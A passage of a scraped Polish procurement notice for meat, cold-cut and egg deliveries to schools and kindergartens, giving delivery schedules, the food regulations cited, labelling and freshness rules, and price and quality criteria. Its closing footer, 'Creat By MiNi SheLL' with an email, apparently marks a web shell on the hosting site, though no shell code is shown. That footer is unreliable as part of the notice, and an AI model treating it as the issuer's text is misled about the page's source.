Dz. U. z 2017 r., poz. 2461),5) Rozporządzenie Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. U. z 2016, poz.1154).6) Rozporządzenie Ministra Zdrowia z dnia 16 września 2010 r. w sprawie środków spożywczych specjalnego przeznaczenia żywieniowego (Dz. U. tj. z 2015, poz. 1026).Wyjątkiem jest żywność zamawiana sporadycznie (kilkakrotnie w ciągu roku), w tym okazjonalnie zamawiane słodycze np. na Mikołajki, Dzień Przedszkolaka itp., która nie będzie spełnić powyższych wymagań. Wymagane jest oznakowanie dostarczanej żywności zgodnie z ww. przepisami. Produkty oznaczone etykietą powinny zawierać dane: nazwę produktu, skład surowcowy, wartości energetyczne, oznaczenie partii, klasy jakości, termin przydatności do spożycia/minimalnej trwałości.Minimalne wymagania dotyczące świeżości zamawianej żywności: przed połową okresu przydatności do spożycia (dla produktów nietrwałych) lub okresu wyznaczonego przez termin minimalnej trwałości (dla produktów trwałych). Powyższe wymaganie dotyczy wszystkich artykułów żywnościowych. Wykonawca będzie dostarczał zamawianą żywność do Zamawiającego (wraz z jej rozładunkiem) do wskazanych pomieszczeń w obiektach Zamawiających oraz będzie zobowiązany do używania środków transportu przystosowanych do przewozu danej żywności zgodnie z obowiązującymi przepisami w tym zakresie - na jego własny koszt.Wykonawca zagwarantuje wymaganą dobrą jakość dostarczanej żywności w zakresie spełniania wymagań sanitarnych i higienicznym przewidzianych dla żywności na terenie Rzeczypospolitej Polskiej.Szczegółowy opis/parametry produktów żywnościowych wraz z podaniem ich ilości w zakresie przedmiotu zamówień/części zamówień określony został w załączniku nr 2.1.Ilości wskazane w formularzach cenowych stanowią prognozy zużycia żywności mające odzwierciedlenie w cenach złożonych ofert w celu dokonania ich oceny.Ryzyko zmian cen Wykonawca uwzględnia w wartościach jednostkowych zawartych w ofercie. Zaoferowane przez Wykonawców w formularzach cenowych wartości jednostkowe nie ulegną zmianom - poza przypadkami określonymi w SIWZ.Wynikające z wyliczeń w formularzach cenowych zaoferowane ceny dla poszczególnych Zamawiających będą określać nominalne wartości przyszłych zobowiązań wynikających z ilości przewidywanej do zakupu żywności w zawartych umowach dostawy. Faktyczne ilości i wartości dostaw, które Wykonawcy będą zobowiązani realizować w okresie trwania umowy, wynikać będą z sukcesywnych dostaw wg zgłoszeń Zamawiających.Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie zgodnie z art. 29 ust. 3 ustawy Pzp, a jest to uzasadnione specyfiką przedmiotu zamówienia, ponieważ Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, przyjmuje się, że wskazaniu takiemu towarzyszą wyrazy „lub równoważny”.Opisując przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, zgodnie z art. 30 ust 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający dopuszcza również rozwiązania równoważne opisywanym Określenie standardów jakościowych odnoszących się do wszystkich istotnych cech przedmiotu zamówienia: Standardy jakościowe zostały określone w szczegółowym opisie przedmiotu zamówienia oraz w przepisach prawa ww. w SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, 03212100-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Mięso</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia są sukcesywne dostawy mięsa (w stanie świeżym) w terminach:3 razy w tygodniu, wg wyboru Zamawiających, w godzinach 7.00 – 8.00.Bieżące ww. sukcesywne dostawy będą zgłaszane nie później niż w dniu poprzedzającym dostawę, przez upoważnionych przedstawicieli Zamawiających. Zamówienia będą zgłaszane w formie faksu, maila lub pisemnie i dodatkowo potwierdzane telefonicznie.Dostawy dokonywane będą w dni robocze: w szkołach w okresach prowadzenia nauki, w przedszkolach - średnio przez 10 miesięcy edukacji przedszkolnej i jednego miesiąca wakacyjnego.Zamawiana żywność musi spełniać wymagania w zakresie obowiązujących przepisów prawa żywnościowego, zgodnie z poniższymi aktami prawnymi:1) ustawa z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. tj. z 2018 roku, poz. 1541 z późn. zmianami) wraz z aktami wykonawczymi,2) ustawa z dnia 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego (Dz. U. tj. z 2017 roku, poz. 242 z późn. zmianami) wraz z aktami wykonawczymi,3) ustawa z dnia 21 grudnia 2000 roku o jakości handlowej artykułów rolno-spożywczych (Dz. U. tj. z 2018 roku, poz. 2164) wraz z aktami wykonawczymi:4) Rozporządzenie Ministra Rolnictwa i Rozwoju Wsi - w sprawie znakowania poszczególnych rodzajów środków spożywczych ( Dz. U. z 2017 r., poz. 2461),5) Rozporządzenie Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. U. z 2016, poz.1154).6) Rozporządzenie Ministra Zdrowia z dnia 16 września 2010 r. w sprawie środków spożywczych specjalnego przeznaczenia żywieniowego (Dz. U. tj. z 2015, poz. 1026).Wyjątkiem jest żywność zamawiana sporadycznie (kilkakrotnie w ciągu roku), w tym okazjonalnie zamawiane słodycze np. na Mikołajki, Dzień Przedszkolaka itp., która nie będzie spełnić powyższych wymagań. Wymagane jest oznakowanie dostarczanej żywności zgodnie z ww. przepisami. Produkty oznaczone etykietą powinny zawierać dane: nazwę produktu, skład surowcowy, wartości energetyczne, oznaczenie partii, klasy jakości, termin przydatności do spożycia/minimalnej trwałości. Minimalne wymagania dotyczące świeżości zamawianej żywności: przed połową okresu przydatności do spożycia (dla produktów nietrwałych) lub okresu wyznaczonego przez termin minimalnej trwałości (dla produktów trwałych). Powyższe wymaganie dotyczy wszystkich artykułów żywnościowych. Wykonawca będzie dostarczał zamawianą żywność do Zamawiającego (wraz z jej rozładunkiem) do wskazanych pomieszczeń w obiektach Zamawiających oraz będzie zobowiązany do używania środków transportu przystosowanych do przewozu danej żywności zgodnie z obowiązującymi przepisami w tym zakresie - na jego własny koszt.Wykonawca zagwarantuje wymaganą dobrą jakość dostarczanej żywności w zakresie spełniania wymagań sanitarnych i higienicznym przewidzianych dla żywności na terenie Rzeczypospolitej Polskiej.. Szczegółowy opis/parametry produktów żywnościowych wraz z podaniem ich ilości w zakresie przedmiotu zamówień/części zamówień określony został w załączniku nr 2.2 stanowiącym formularz cenowy. Ilości wskazane w formularzu cenowym stanowią prognozy zużycia żywności mające odzwierciedlenie w cenach złożonych ofert w celu dokonania ich oceny.Ryzyko zmian cen Wykonawca uwzględnia w wartościach jednostkowych zawartych w ofercie. Zaoferowane przez Wykonawców w formularzach cenowych wartości jednostkowe nie ulegną zmianom - poza przypadkami określonymi w SIWZ.Wynikające z wyliczeń w formularzach cenowych zaoferowane ceny dla poszczególnych Zamawiających będą określać nominalne wartości przyszłych zobowiązań wynikających z ilości przewidywanej do zakupu żywności w zawartych umowach dostawy. Faktyczne ilości i wartości dostaw, które Wykonawcy będą zobowiązani realizować w okresie trwania umowy, wynikać będą z sukcesywnych dostaw wg zgłoszeń Zamawiających.Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie zgodnie z art. 29 ust. 3 ustawy Pzp, a jest to uzasadnione specyfiką przedmiotu zamówienia, ponieważ Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, przyjmuje się, że wskazaniu takiemu towarzyszą wyrazy „lub równoważny”.Opisując przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, zgodnie z art. 30 ust 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający dopuszcza również rozwiązania równoważne opisywanym Określenie standardów jakościowych odnoszących się do wszystkich istotnych cech przedmiotu zamówienia: Standardy jakościowe zostały określone w szczegółowym opisie przedmiotu zamówienia oraz w przepisach prawa ww. w SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15100000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Świeżość</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Wędliny</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia są sukcesywne dostawy wędlin (w stanie świeżym) w terminach:– 3 razy w tygodniu, wg wyboru Zamawiających, w godzinach 7.00 – 8.00.Bieżące ww. sukcesywne dostawy będą zgłaszane nie później niż w dniu poprzedzającym dostawę, przez upoważnionych przedstawicieli Zamawiających. Zamówienia będą zgłaszane w formie faksu, maila lub pisemnie i dodatkowo potwierdzane telefonicznie.Dostawy dokonywane będą w dni robocze: w szkołach w okresach prowadzenia nauki, w przedszkolach - średnio przez 10 miesięcy edukacji przedszkolnej i jednego miesiąca wakacyjnego. Zamawiana żywność musi spełniać wymagania w zakresie obowiązujących przepisów prawa żywnościowego, zgodnie z poniższymi aktami prawnymi:1) ustawa z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. tj. z 2018 roku, poz. 1541 z późn. zmianami) wraz z aktami wykonawczymi,2) ustawa z dnia 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego (Dz. U. tj. z 2017 roku, poz. 242 z późn. zmianami) wraz z aktami wykonawczymi,3) ustawa z dnia 21 grudnia 2000 roku o jakości handlowej artykułów rolno-spożywczych (Dz. U. tj. z 2018 roku, poz. 2164) wraz z aktami wykonawczymi:4) Rozporządzenie Ministra Rolnictwa i Rozwoju Wsi - w sprawie znakowania poszczególnych rodzajów środków spożywczych ( Dz. U. z 2017 r., poz. 2461),5) Rozporządzenie Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. U. z 2016, poz.1154).6) Rozporządzenie Ministra Zdrowia z dnia 16 września 2010 r. w sprawie środków spożywczych specjalnego przeznaczenia żywieniowego (Dz. U. tj. z 2015, poz. 1026).Wyjątkiem jest żywność zamawiana sporadycznie (kilkakrotnie w ciągu roku), w tym okazjonalnie zamawiane słodycze np. na Mikołajki, Dzień Przedszkolaka itp., która nie będzie spełnić powyższych wymagań. Wymagane jest oznakowanie dostarczanej żywności zgodnie z ww. przepisami. Produkty oznaczone etykietą powinny zawierać dane: nazwę produktu, skład surowcowy, wartości energetyczne, oznaczenie partii, klasy jakości, termin przydatności do spożycia/minimalnej trwałości. Minimalne wymagania dotyczące świeżości zamawianej żywności: przed połową okresu przydatności do spożycia (dla produktów nietrwałych) lub okresu wyznaczonego przez termin minimalnej trwałości (dla produktów trwałych). Powyższe wymaganie dotyczy wszystkich artykułów żywnościowych. Wykonawca będzie dostarczał zamawianą żywność do Zamawiającego (wraz z jej rozładunkiem) do wskazanych pomieszczeń w obiektach Zamawiających oraz będzie zobowiązany do używania środków transportu przystosowanych do przewozu danej żywności zgodnie z obowiązującymi przepisami w tym zakresie - na jego własny koszt.Wykonawca zagwarantuje wymaganą dobrą jakość dostarczanej żywności w zakresie spełniania wymagań sanitarnych i higienicznym przewidzianych dla żywności na terenie Rzeczypospolitej Polskiej.Szczegółowy opis/parametry produktów żywnościowych wraz z podaniem ich ilości w zakresie przedmiotu zamówień/części zamówień określony został w załączniku nr 2.3 stanowiącym formularz cenowy. Ilości wskazane w formularzu cenowym stanowią prognozy zużycia żywności mające odzwierciedlenie w cenach złożonych ofert w celu dokonania ich oceny.Ryzyko zmian cen Wykonawca uwzględnia w wartościach jednostkowych zawartych w ofercie. Zaoferowane przez Wykonawców w formularzach cenowych wartości jednostkowe nie ulegną zmianom - poza przypadkami określonymi w SIWZ.Wynikające z wyliczeń w formularzach cenowych zaoferowane ceny dla poszczególnych Zamawiających będą określać nominalne wartości przyszłych zobowiązań wynikających z ilości przewidywanej do zakupu żywności w zawartych umowach dostawy. Faktyczne ilości i wartości dostaw, które Wykonawcy będą zobowiązani realizować w okresie trwania umowy, wynikać będą z sukcesywnych dostaw wg zgłoszeń Zamawiających.Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie zgodnie z art. 29 ust. 3 ustawy Pzp, a jest to uzasadnione specyfiką przedmiotu zamówienia, ponieważ Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, przyjmuje się, że wskazaniu takiemu towarzyszą wyrazy „lub równoważny”.Opisując przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, zgodnie z art. 30 ust 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający dopuszcza również rozwiązania równoważne opisywanym Określenie standardów jakościowych odnoszących się do wszystkich istotnych cech przedmiotu zamówienia: Standardy jakościowe zostały określone w szczegółowym opisie przedmiotu zamówienia oraz w przepisach prawa ww. w SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15131130-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">70,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Świeżość</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Jakość</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Jaja</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia są sukcesywne dostawy jaj kurzych w terminach:- 2 razy w tygodniu (wtorek, piątek), w godzinach 7.30 – 10.00.Bieżące ww. sukcesywne dostawy będą zgłaszane nie później niż w dniu poprzedzającym dostawę, przez upoważnionych przedstawicieli Zamawiających. Zamówienia będą zgłaszane w formie faksu, maila lub pisemnie i dodatkowo potwierdzane telefonicznie.Dostawy dokonywane będą w dni robocze: w szkołach w okresach prowadzenia nauki, w przedszkolach - średnio przez 10 miesięcy edukacji przedszkolnej i jednego miesiąca wakacyjnego. Zamawiana żywność musi spełniać wymagania w zakresie obowiązujących przepisów prawa żywnościowego, zgodnie z poniższymi aktami prawnymi:1) ustawa z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. tj. z 2018 roku, poz. 1541 z późn. zmianami) wraz z aktami wykonawczymi,2) ustawa z dnia 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego (Dz. U. tj. z 2017 roku, poz. 242 z późn. zmianami) wraz z aktami wykonawczymi,3) ustawa z dnia 21 grudnia 2000 roku o jakości handlowej artykułów rolno-spożywczych (Dz. U. tj. z 2018 roku, poz. 2164) wraz z aktami wykonawczymi:4) Rozporządzenie Ministra Rolnictwa i Rozwoju Wsi - w sprawie znakowania poszczególnych rodzajów środków spożywczych ( Dz. U. z 2017 r., poz. 2461),5) Rozporządzenie Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. U. z 2016, poz.1154).6) Rozporządzenie Ministra Zdrowia z dnia 16 września 2010 r. w sprawie środków spożywczych specjalnego przeznaczenia żywieniowego (Dz. U. tj. z 2015, poz. 1026).Wyjątkiem jest żywność zamawiana sporadycznie (kilkakrotnie w ciągu roku), w tym okazjonalnie zamawiane słodycze np. na Mikołajki, Dzień Przedszkolaka itp., która nie będzie spełnić powyższych wymagań. Wymagane jest oznakowanie dostarczanej żywności zgodnie z ww. przepisami. Produkty oznaczone etykietą powinny zawierać dane: nazwę produktu, skład surowcowy, wartości energetyczne, oznaczenie partii, klasy jakości, termin przydatności do spożycia/minimalnej trwałości. Minimalne wymagania dotyczące świeżości zamawianej żywności: przed połową okresu przydatności do spożycia (dla produktów nietrwałych) lub okresu wyznaczonego przez termin minimalnej trwałości (dla produktów trwałych). Powyższe wymaganie dotyczy wszystkich artykułów żywnościowych. Wykonawca będzie dostarczał zamawianą żywność do Zamawiającego (wraz z jej rozładunkiem) do wskazanych pomieszczeń w obiektach Zamawiających oraz będzie zobowiązany do używania środków transportu przystosowanych do przewozu danej żywności zgodnie z obowiązującymi przepisami w tym zakresie - na jego własny koszt.Wykonawca zagwarantuje wymaganą dobrą jakość dostarczanej żywności w zakresie spełniania wymagań sanitarnych i higienicznym przewidzianych dla żywności na terenie Rzeczypospolitej Polskiej.Szczegółowy opis/parametry produktów żywnościowych wraz z podaniem ich ilości w zakresie przedmiotu zamówień/części zamówień określony został w załączniku od nr 2.4 stanowiącym formularz cenowy. Ilości wskazane w formularzu cenowym stanowią prognozy zużycia żywności mające odzwierciedlenie w cenach złożonych ofert w celu dokonania ich oceny.Ryzyko zmian cen Wykonawca uwzględnia w wartościach jednostkowych zawartych w ofercie. Zaoferowane przez Wykonawców w formularzach cenowych wartości jednostkowe nie ulegną zmianom - poza przypadkami określonymi w SIWZ.Wynikające z wyliczeń w formularzach cenowych zaoferowane ceny dla poszczególnych Zamawiających będą określać nominalne wartości przyszłych zobowiązań wynikających z ilości przewidywanej do zakupu żywności w zawartych umowach dostawy. Faktyczne ilości i wartości dostaw, które Wykonawcy będą zobowiązani realizować w okresie trwania umowy, wynikać będą z sukcesywnych dostaw wg zgłoszeń Zamawiających.Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie zgodnie z art. 29 ust. 3 ustawy Pzp, a jest to uzasadnione specyfiką przedmiotu zamówienia, ponieważ Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, przyjmuje się, że wskazaniu takiemu towarzyszą wyrazy „lub równoważny”.Opisując przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, zgodnie z art. 30 ust 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający dopuszcza również rozwiązania równoważne opisywanym Określenie standardów jakościowych odnoszących się do wszystkich istotnych cech przedmiotu zamówienia: Standardy jakościowe zostały określone w szczegółowym opisie przedmiotu zamówienia oraz w przepisach prawa ww. w SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03142500-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com